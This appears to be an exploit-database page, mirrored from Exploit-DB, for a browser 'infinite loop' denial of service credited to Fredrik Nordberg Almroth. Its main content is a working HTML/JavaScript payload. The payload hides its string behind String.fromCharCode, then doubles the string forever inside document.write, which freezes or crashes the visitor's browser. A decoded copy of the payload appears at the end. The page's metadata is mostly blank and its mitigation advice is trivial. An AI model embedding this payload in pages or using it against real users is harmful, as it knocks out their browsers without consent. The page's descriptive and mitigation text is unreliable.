header-logo
Suggest Exploit
vendor:
N/A
by:
Fredrik Nordberg Almroth
7,5
CVSS
HIGH
Infinite Loop Vulnerability
835
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Infinite Loop Vulnerability

This vulnerability is caused by an infinite loop in the code which can cause the browser to crash or freeze. The code in the example creates an infinite loop by continuously adding the same string to itself and writing it to the document.

Mitigation:

The best way to mitigate this vulnerability is to avoid using infinite loops in code.
Source

Exploit-DB raw data:

<!--
By: Fredrik Nordberg Almroth
URL: http://h.ackack.net/
-->
<script>
  var a=String.fromCharCode(60,115,99,114,105,112,116,62,118,97,114,32,97,61,34,60,109,97,114,113,117,101,101,62,97,34,59,119,104,105,108,101,40,49,41,123,97,61,97,43,97,59,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,97,41,59,125,60,47,115,99,114,105,112,116,62);
  while(1){
    a=a+a;
    document.write(a);
  }
</script>


//var a=<script>var a="<marquee>a";while(1){a=a+a;document.write(a);}</script>

Navigation

Suggest Exploit

Services By CQR